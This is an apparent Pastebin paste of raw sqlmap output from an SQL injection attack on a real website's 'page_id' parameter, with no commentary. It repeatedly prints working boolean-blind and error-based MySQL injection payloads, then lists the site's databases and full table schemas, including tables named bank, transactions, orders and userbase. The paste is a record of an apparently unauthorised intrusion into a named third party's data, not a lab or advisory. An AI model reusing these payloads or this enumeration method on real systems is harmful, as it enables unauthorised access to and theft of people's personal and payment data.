API tools faq
paste
Guest User

Untitled

a guest
May 17th, 2018
252
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
SQL 34.44 KB | None | 0 0
raw download clone embed print report
  1. sqlmap IDENTIFIED the following injection points WITH a total OF 28 HTTP(s) requests:
  2. ---
  3. Place: GET
  4. Parameter: page_id
  5.     TYPE: boolean-based blind
  6.     Title: AND boolean-based blind - WHERE OR HAVING clause
  7.     Payload: page_id=28167956 AND 1228=1228
  8.  
  9.     TYPE: error-based
  10.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  11.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  12. ---
  13.  
  14. available DATABASES [9]:
  15. [*] information_schema
  16. [*] mysql
  17. [*] orcataco_bumperstic
  18. [*] orcataco_officerjones
  19. [*] orcataco_officerjones_1
  20. [*] orcataco_officerjones_2
  21. [*] orcataco_snap
  22. [*] signedbump
  23. [*] test
  24.  
  25. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  26. ---
  27. Place: GET
  28. Parameter: page_id
  29.     TYPE: boolean-based blind
  30.     Title: AND boolean-based blind - WHERE OR HAVING clause
  31.     Payload: page_id=28167956 AND 1228=1228
  32.  
  33.     TYPE: error-based
  34.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  35.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  36. ---
  37.  
  38. DATABASE: mysql
  39. [17 TABLES]
  40. +---------------------------+
  41. | columns_priv              |
  42. | db                        |
  43. | func                      |
  44. | help_category             |
  45. | help_keyword              |
  46. | help_relation             |
  47. | help_topic                |
  48. | host                      |
  49. | proc                      |
  50. | procs_priv                |
  51. | tables_priv               |
  52. | time_zone                 |
  53. | time_zone_leap_second     |
  54. | time_zone_name            |
  55. | time_zone_transition      |
  56. | time_zone_transition_type |
  57. | USER                      |
  58. +---------------------------+
  59.  
  60. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  61. ---
  62. Place: GET
  63. Parameter: page_id
  64.     TYPE: boolean-based blind
  65.     Title: AND boolean-based blind - WHERE OR HAVING clause
  66.     Payload: page_id=28167956 AND 1228=1228
  67.  
  68.     TYPE: error-based
  69.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  70.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  71. ---
  72.  
  73. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  74. ---
  75. Place: GET
  76. Parameter: page_id
  77.     TYPE: boolean-based blind
  78.     Title: AND boolean-based blind - WHERE OR HAVING clause
  79.     Payload: page_id=28167956 AND 1228=1228
  80.  
  81.     TYPE: error-based
  82.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  83.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  84. ---
  85.  
  86. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  87. ---
  88. Place: GET
  89. Parameter: page_id
  90.     TYPE: boolean-based blind
  91.     Title: AND boolean-based blind - WHERE OR HAVING clause
  92.     Payload: page_id=28167956 AND 1228=1228
  93.  
  94.     TYPE: error-based
  95.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  96.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  97. ---
  98.  
  99. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  100. ---
  101. Place: GET
  102. Parameter: page_id
  103.     TYPE: boolean-based blind
  104.     Title: AND boolean-based blind - WHERE OR HAVING clause
  105.     Payload: page_id=28167956 AND 1228=1228
  106.  
  107.     TYPE: error-based
  108.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  109.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  110. ---
  111.  
  112. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  113. ---
  114. Place: GET
  115. Parameter: page_id
  116.     TYPE: boolean-based blind
  117.     Title: AND boolean-based blind - WHERE OR HAVING clause
  118.     Payload: page_id=28167956 AND 1228=1228
  119.  
  120.     TYPE: error-based
  121.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  122.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  123. ---
  124.  
  125. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  126. ---
  127. Place: GET
  128. Parameter: page_id
  129.     TYPE: boolean-based blind
  130.     Title: AND boolean-based blind - WHERE OR HAVING clause
  131.     Payload: page_id=28167956 AND 1228=1228
  132.  
  133.     TYPE: error-based
  134.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  135.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  136. ---
  137.  
  138. available DATABASES [9]:
  139. [*] information_schema
  140. [*] mysql
  141. [*] orcataco_bumperstic
  142. [*] orcataco_officerjones
  143. [*] orcataco_officerjones_1
  144. [*] orcataco_officerjones_2
  145. [*] orcataco_snap
  146. [*] signedbump
  147. [*] test
  148.  
  149. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  150. ---
  151. Place: GET
  152. Parameter: page_id
  153.     TYPE: boolean-based blind
  154.     Title: AND boolean-based blind - WHERE OR HAVING clause
  155.     Payload: page_id=28167956 AND 1228=1228
  156.  
  157.     TYPE: error-based
  158.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  159.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  160. ---
  161.  
  162. DATABASE: orcataco_bumperstic
  163. [113 TABLES]
  164. +--------------------------+
  165. | _settings                |
  166. | bank                     |
  167. | basket_items             |
  168. | basket_orders            |
  169. | basket_tags              |
  170. | baskets                  |
  171. | brands                   |
  172. | bsuids                   |
  173. | categories               |
  174. | clickemail               |
  175. | clickwizard              |
  176. | comment                  |
  177. | counters                 |
  178. | counters_i12             |
  179. | counters_i24             |
  180. | counters_o12             |
  181. | counters_o24             |
  182. | emailsendlog             |
  183. | favorite_orders          |
  184. | feedback                 |
  185. | game                     |
  186. | game_score               |
  187. | hm_events                |
  188. | hm_message_queue         |
  189. | invited                  |
  190. | invited_from_force       |
  191. | item_book                |
  192. | item_tags                |
  193. | items                    |
  194. | line_items               |
  195. | logadd                   |
  196. | logcontacts              |
  197. | loggiftclick             |
  198. | logimport                |
  199. | loginvite                |
  200. | loginvited               |
  201. | logvalidate              |
  202. | logwizard                |
  203. | motd                     |
  204. | notified                 |
  205. | notify_off               |
  206. | occasions                |
  207. | orders                   |
  208. | orders_non_facebook      |
  209. | page_items               |
  210. | played                   |
  211. | post_install_items       |
  212. | post_install_items_v2    |
  213. | profile_settings         |
  214. | public_pages             |
  215. | publish_stream_sgnonpred |
  216. | purchase                 |
  217. | quicksender              |
  218. | recent_users             |
  219. | reply_from_hist          |
  220. | requests_sent            |
  221. | rpd_by_day               |
  222. | sendqueue                |
  223. | sendsthisweek            |
  224. | sendsthisweek2           |
  225. | sent                     |
  226. | settings                 |
  227. | stream_posts             |
  228. | survey_answers           |
  229. | survey_questions         |
  230. | tag_stats                |
  231. | tags                     |
  232. | temp_birthday_orders     |
  233. | temp_click_events        |
  234. | temp_daily_stats         |
  235. | temp_despicable_me       |
  236. | temp_funnel_test_orders  |
  237. | temp_hourly_stats        |
  238. | temp_invite_stats        |
  239. | temp_invite_stats_v2     |
  240. | temp_item_recs2          |
  241. | temp_nectar_ads          |
  242. | temp_nectar_stats_v2     |
  243. | temp_order_clicks        |
  244. | temp_page_counter        |
  245. | temp_page_visits         |
  246. | temp_premium_orders      |
  247. | temp_request_demo_stats  |
  248. | temp_request_stats       |
  249. | temp_retention_daily     |
  250. | temp_retention_weekly    |
  251. | temp_sendgroup_members   |
  252. | temp_sendgroup_sends     |
  253. | temp_test_order_users    |
  254. | temp_test_orders         |
  255. | temp_tutorial_stages     |
  256. | temp_user_credits        |
  257. | temp_userbase            |
  258. | theme_tag_map            |
  259. | theme_tags               |
  260. | themes                   |
  261. | themes_user_gen          |
  262. | transactions             |
  263. | uids                     |
  264. | unlocked                 |
  265. | unopened                 |
  266. | unsent                   |
  267. | unsubscribe              |
  268. | user_country             |
  269. | user_groups              |
  270. | user_items               |
  271. | user_pages               |
  272. | user_pageviews           |
  273. | user_pageviews_v2        |
  274. | user_themes              |
  275. | userbase                 |
  276. | winner                   |
  277. | wishlist                 |
  278. +--------------------------+
  279.  
  280. DATABASE: test
  281. [21 TABLES]
  282. +------------------------+
  283. | TempTable              |
  284. | appinfo                |
  285. | autoincr               |
  286. | cur                    |
  287. | deals                  |
  288. | errorcounts            |
  289. | errorfromfirst1000     |
  290. | install_metrics        |
  291. | installs_by_day        |
  292. | installs_by_invite_day |
  293. | invited_from_force     |
  294. | invites_by_day         |
  295. | invites_by_newuser_day |
  296. | ret_users2             |
  297. | retlog                 |
  298. | rpdbyda                |
  299. | send_log               |
  300. | uids                   |
  301. | user_country           |
  302. | x                      |
  303. | y                      |
  304. +------------------------+
  305.  
  306. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  307. ---
  308. Place: GET
  309. Parameter: page_id
  310.     TYPE: boolean-based blind
  311.     Title: AND boolean-based blind - WHERE OR HAVING clause
  312.     Payload: page_id=28167956 AND 1228=1228
  313.  
  314.     TYPE: error-based
  315.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  316.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  317. ---
  318.  
  319. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  320. ---
  321. Place: GET
  322. Parameter: page_id
  323.     TYPE: boolean-based blind
  324.     Title: AND boolean-based blind - WHERE OR HAVING clause
  325.     Payload: page_id=28167956 AND 1228=1228
  326.  
  327.     TYPE: error-based
  328.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  329.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  330. ---
  331.  
  332. DATABASE: test
  333. [21 TABLES]
  334. +------------------------+
  335. | TempTable              |
  336. | appinfo                |
  337. | autoincr               |
  338. | cur                    |
  339. | deals                  |
  340. | errorcounts            |
  341. | errorfromfirst1000     |
  342. | install_metrics        |
  343. | installs_by_day        |
  344. | installs_by_invite_day |
  345. | invited_from_force     |
  346. | invites_by_day         |
  347. | invites_by_newuser_day |
  348. | ret_users2             |
  349. | retlog                 |
  350. | rpdbyda                |
  351. | send_log               |
  352. | uids                   |
  353. | user_country           |
  354. | x                      |
  355. | y                      |
  356. +------------------------+
  357.  
  358. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  359. ---
  360. Place: GET
  361. Parameter: page_id
  362.     TYPE: boolean-based blind
  363.     Title: AND boolean-based blind - WHERE OR HAVING clause
  364.     Payload: page_id=28167956 AND 1228=1228
  365.  
  366.     TYPE: error-based
  367.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  368.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  369. ---
  370.  
  371. DATABASE: orcataco_bumperstic
  372. [113 TABLES]
  373. +--------------------------+
  374. | _settings                |
  375. | bank                     |
  376. | basket_items             |
  377. | basket_orders            |
  378. | basket_tags              |
  379. | baskets                  |
  380. | brands                   |
  381. | bsuids                   |
  382. | categories               |
  383. | clickemail               |
  384. | clickwizard              |
  385. | comment                  |
  386. | counters                 |
  387. | counters_i12             |
  388. | counters_i24             |
  389. | counters_o12             |
  390. | counters_o24             |
  391. | emailsendlog             |
  392. | favorite_orders          |
  393. | feedback                 |
  394. | game                     |
  395. | game_score               |
  396. | hm_events                |
  397. | hm_message_queue         |
  398. | invited                  |
  399. | invited_from_force       |
  400. | item_book                |
  401. | item_tags                |
  402. | items                    |
  403. | line_items               |
  404. | logadd                   |
  405. | logcontacts              |
  406. | loggiftclick             |
  407. | logimport                |
  408. | loginvite                |
  409. | loginvited               |
  410. | logvalidate              |
  411. | logwizard                |
  412. | motd                     |
  413. | notified                 |
  414. | notify_off               |
  415. | occasions                |
  416. | orders                   |
  417. | orders_non_facebook      |
  418. | page_items               |
  419. | played                   |
  420. | post_install_items       |
  421. | post_install_items_v2    |
  422. | profile_settings         |
  423. | public_pages             |
  424. | publish_stream_sgnonpred |
  425. | purchase                 |
  426. | quicksender              |
  427. | recent_users             |
  428. | reply_from_hist          |
  429. | requests_sent            |
  430. | rpd_by_day               |
  431. | sendqueue                |
  432. | sendsthisweek            |
  433. | sendsthisweek2           |
  434. | sent                     |
  435. | settings                 |
  436. | stream_posts             |
  437. | survey_answers           |
  438. | survey_questions         |
  439. | tag_stats                |
  440. | tags                     |
  441. | temp_birthday_orders     |
  442. | temp_click_events        |
  443. | temp_daily_stats         |
  444. | temp_despicable_me       |
  445. | temp_funnel_test_orders  |
  446. | temp_hourly_stats        |
  447. | temp_invite_stats        |
  448. | temp_invite_stats_v2     |
  449. | temp_item_recs2          |
  450. | temp_nectar_ads          |
  451. | temp_nectar_stats_v2     |
  452. | temp_order_clicks        |
  453. | temp_page_counter        |
  454. | temp_page_visits         |
  455. | temp_premium_orders      |
  456. | temp_request_demo_stats  |
  457. | temp_request_stats       |
  458. | temp_retention_daily     |
  459. | temp_retention_weekly    |
  460. | temp_sendgroup_members   |
  461. | temp_sendgroup_sends     |
  462. | temp_test_order_users    |
  463. | temp_test_orders         |
  464. | temp_tutorial_stages     |
  465. | temp_user_credits        |
  466. | temp_userbase            |
  467. | theme_tag_map            |
  468. | theme_tags               |
  469. | themes                   |
  470. | themes_user_gen          |
  471. | transactions             |
  472. | uids                     |
  473. | unlocked                 |
  474. | unopened                 |
  475. | unsent                   |
  476. | unsubscribe              |
  477. | user_country             |
  478. | user_groups              |
  479. | user_items               |
  480. | user_pages               |
  481. | user_pageviews           |
  482. | user_pageviews_v2        |
  483. | user_themes              |
  484. | userbase                 |
  485. | winner                   |
  486. | wishlist                 |
  487. +--------------------------+
  488.  
  489. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  490. ---
  491. Place: GET
  492. Parameter: page_id
  493.     TYPE: boolean-based blind
  494.     Title: AND boolean-based blind - WHERE OR HAVING clause
  495.     Payload: page_id=28167956 AND 1228=1228
  496.  
  497.     TYPE: error-based
  498.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  499.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  500. ---
  501.  
  502. DATABASE: orcataco_bumperstic
  503. [113 TABLES]
  504. +--------------------------+
  505. | _settings                |
  506. | bank                     |
  507. | basket_items             |
  508. | basket_orders            |
  509. | basket_tags              |
  510. | baskets                  |
  511. | brands                   |
  512. | bsuids                   |
  513. | categories               |
  514. | clickemail               |
  515. | clickwizard              |
  516. | comment                  |
  517. | counters                 |
  518. | counters_i12             |
  519. | counters_i24             |
  520. | counters_o12             |
  521. | counters_o24             |
  522. | emailsendlog             |
  523. | favorite_orders          |
  524. | feedback                 |
  525. | game                     |
  526. | game_score               |
  527. | hm_events                |
  528. | hm_message_queue         |
  529. | invited                  |
  530. | invited_from_force       |
  531. | item_book                |
  532. | item_tags                |
  533. | items                    |
  534. | line_items               |
  535. | logadd                   |
  536. | logcontacts              |
  537. | loggiftclick             |
  538. | logimport                |
  539. | loginvite                |
  540. | loginvited               |
  541. | logvalidate              |
  542. | logwizard                |
  543. | motd                     |
  544. | notified                 |
  545. | notify_off               |
  546. | occasions                |
  547. | orders                   |
  548. | orders_non_facebook      |
  549. | page_items               |
  550. | played                   |
  551. | post_install_items       |
  552. | post_install_items_v2    |
  553. | profile_settings         |
  554. | public_pages             |
  555. | publish_stream_sgnonpred |
  556. | purchase                 |
  557. | quicksender              |
  558. | recent_users             |
  559. | reply_from_hist          |
  560. | requests_sent            |
  561. | rpd_by_day               |
  562. | sendqueue                |
  563. | sendsthisweek            |
  564. | sendsthisweek2           |
  565. | sent                     |
  566. | settings                 |
  567. | stream_posts             |
  568. | survey_answers           |
  569. | survey_questions         |
  570. | tag_stats                |
  571. | tags                     |
  572. | temp_birthday_orders     |
  573. | temp_click_events        |
  574. | temp_daily_stats         |
  575. | temp_despicable_me       |
  576. | temp_funnel_test_orders  |
  577. | temp_hourly_stats        |
  578. | temp_invite_stats        |
  579. | temp_invite_stats_v2     |
  580. | temp_item_recs2          |
  581. | temp_nectar_ads          |
  582. | temp_nectar_stats_v2     |
  583. | temp_order_clicks        |
  584. | temp_page_counter        |
  585. | temp_page_visits         |
  586. | temp_premium_orders      |
  587. | temp_request_demo_stats  |
  588. | temp_request_stats       |
  589. | temp_retention_daily     |
  590. | temp_retention_weekly    |
  591. | temp_sendgroup_members   |
  592. | temp_sendgroup_sends     |
  593. | temp_test_order_users    |
  594. | temp_test_orders         |
  595. | temp_tutorial_stages     |
  596. | temp_user_credits        |
  597. | temp_userbase            |
  598. | theme_tag_map            |
  599. | theme_tags               |
  600. | themes                   |
  601. | themes_user_gen          |
  602. | transactions             |
  603. | uids                     |
  604. | unlocked                 |
  605. | unopened                 |
  606. | unsent                   |
  607. | unsubscribe              |
  608. | user_country             |
  609. | user_groups              |
  610. | user_items               |
  611. | user_pages               |
  612. | user_pageviews           |
  613. | user_pageviews_v2        |
  614. | user_themes              |
  615. | userbase                 |
  616. | winner                   |
  617. | wishlist                 |
  618. +--------------------------+
  619.  
  620. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  621. ---
  622. Place: GET
  623. Parameter: page_id
  624.     TYPE: boolean-based blind
  625.     Title: AND boolean-based blind - WHERE OR HAVING clause
  626.     Payload: page_id=28167956 AND 1228=1228
  627.  
  628.     TYPE: error-based
  629.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  630.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  631. ---
  632.  
  633. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  634. ---
  635. Place: GET
  636. Parameter: page_id
  637.     TYPE: boolean-based blind
  638.     Title: AND boolean-based blind - WHERE OR HAVING clause
  639.     Payload: page_id=28167956 AND 1228=1228
  640.  
  641.     TYPE: error-based
  642.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  643.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  644. ---
  645.  
  646. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  647. ---
  648. Place: GET
  649. Parameter: page_id
  650.     TYPE: boolean-based blind
  651.     Title: AND boolean-based blind - WHERE OR HAVING clause
  652.     Payload: page_id=28167956 AND 1228=1228
  653.  
  654.     TYPE: error-based
  655.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  656.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  657. ---
  658.  
  659. DATABASE: orcataco_bumperstic
  660. [113 TABLES]
  661. +--------------------------+
  662. | _settings                |
  663. | bank                     |
  664. | basket_items             |
  665. | basket_orders            |
  666. | basket_tags              |
  667. | baskets                  |
  668. | brands                   |
  669. | bsuids                   |
  670. | categories               |
  671. | clickemail               |
  672. | clickwizard              |
  673. | comment                  |
  674. | counters                 |
  675. | counters_i12             |
  676. | counters_i24             |
  677. | counters_o12             |
  678. | counters_o24             |
  679. | emailsendlog             |
  680. | favorite_orders          |
  681. | feedback                 |
  682. | game                     |
  683. | game_score               |
  684. | hm_events                |
  685. | hm_message_queue         |
  686. | invited                  |
  687. | invited_from_force       |
  688. | item_book                |
  689. | item_tags                |
  690. | items                    |
  691. | line_items               |
  692. | logadd                   |
  693. | logcontacts              |
  694. | loggiftclick             |
  695. | logimport                |
  696. | loginvite                |
  697. | loginvited               |
  698. | logvalidate              |
  699. | logwizard                |
  700. | motd                     |
  701. | notified                 |
  702. | notify_off               |
  703. | occasions                |
  704. | orders                   |
  705. | orders_non_facebook      |
  706. | page_items               |
  707. | played                   |
  708. | post_install_items       |
  709. | post_install_items_v2    |
  710. | profile_settings         |
  711. | public_pages             |
  712. | publish_stream_sgnonpred |
  713. | purchase                 |
  714. | quicksender              |
  715. | recent_users             |
  716. | reply_from_hist          |
  717. | requests_sent            |
  718. | rpd_by_day               |
  719. | sendqueue                |
  720. | sendsthisweek            |
  721. | sendsthisweek2           |
  722. | sent                     |
  723. | settings                 |
  724. | stream_posts             |
  725. | survey_answers           |
  726. | survey_questions         |
  727. | tag_stats                |
  728. | tags                     |
  729. | temp_birthday_orders     |
  730. | temp_click_events        |
  731. | temp_daily_stats         |
  732. | temp_despicable_me       |
  733. | temp_funnel_test_orders  |
  734. | temp_hourly_stats        |
  735. | temp_invite_stats        |
  736. | temp_invite_stats_v2     |
  737. | temp_item_recs2          |
  738. | temp_nectar_ads          |
  739. | temp_nectar_stats_v2     |
  740. | temp_order_clicks        |
  741. | temp_page_counter        |
  742. | temp_page_visits         |
  743. | temp_premium_orders      |
  744. | temp_request_demo_stats  |
  745. | temp_request_stats       |
  746. | temp_retention_daily     |
  747. | temp_retention_weekly    |
  748. | temp_sendgroup_members   |
  749. | temp_sendgroup_sends     |
  750. | temp_test_order_users    |
  751. | temp_test_orders         |
  752. | temp_tutorial_stages     |
  753. | temp_user_credits        |
  754. | temp_userbase            |
  755. | theme_tag_map            |
  756. | theme_tags               |
  757. | themes                   |
  758. | themes_user_gen          |
  759. | transactions             |
  760. | uids                     |
  761. | unlocked                 |
  762. | unopened                 |
  763. | unsent                   |
  764. | unsubscribe              |
  765. | user_country             |
  766. | user_groups              |
  767. | user_items               |
  768. | user_pages               |
  769. | user_pageviews           |
  770. | user_pageviews_v2        |
  771. | user_themes              |
  772. | userbase                 |
  773. | winner                   |
  774. | wishlist                 |
  775. +--------------------------+
  776.  
  777. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  778. ---
  779. Place: GET
  780. Parameter: page_id
  781.     TYPE: boolean-based blind
  782.     Title: AND boolean-based blind - WHERE OR HAVING clause
  783.     Payload: page_id=28167956 AND 1228=1228
  784.  
  785.     TYPE: error-based
  786.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  787.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  788. ---
  789.  
  790. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  791. ---
  792. Place: GET
  793. Parameter: page_id
  794.     TYPE: boolean-based blind
  795.     Title: AND boolean-based blind - WHERE OR HAVING clause
  796.     Payload: page_id=28167956 AND 1228=1228
  797.  
  798.     TYPE: error-based
  799.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  800.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  801. ---
  802.  
  803. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  804. ---
  805. Place: GET
  806. Parameter: page_id
  807.     TYPE: boolean-based blind
  808.     Title: AND boolean-based blind - WHERE OR HAVING clause
  809.     Payload: page_id=28167956 AND 1228=1228
  810.  
  811.     TYPE: error-based
  812.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  813.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  814. ---
  815.  
  816. help [1]:
  817.  
  818. wget txt [1]:
  819.  
  820. ? [1]:
  821.  
  822. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  823. ---
  824. Place: GET
  825. Parameter: page_id
  826.     TYPE: boolean-based blind
  827.     Title: AND boolean-based blind - WHERE OR HAVING clause
  828.     Payload: page_id=28167956 AND 1228=1228
  829.  
  830.     TYPE: error-based
  831.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  832.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  833. ---
  834.  
  835. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  836. ---
  837. Place: GET
  838. Parameter: page_id
  839.     TYPE: boolean-based blind
  840.     Title: AND boolean-based blind - WHERE OR HAVING clause
  841.     Payload: page_id=28167956 AND 1228=1228
  842.  
  843.     TYPE: error-based
  844.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  845.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  846. ---
  847.  
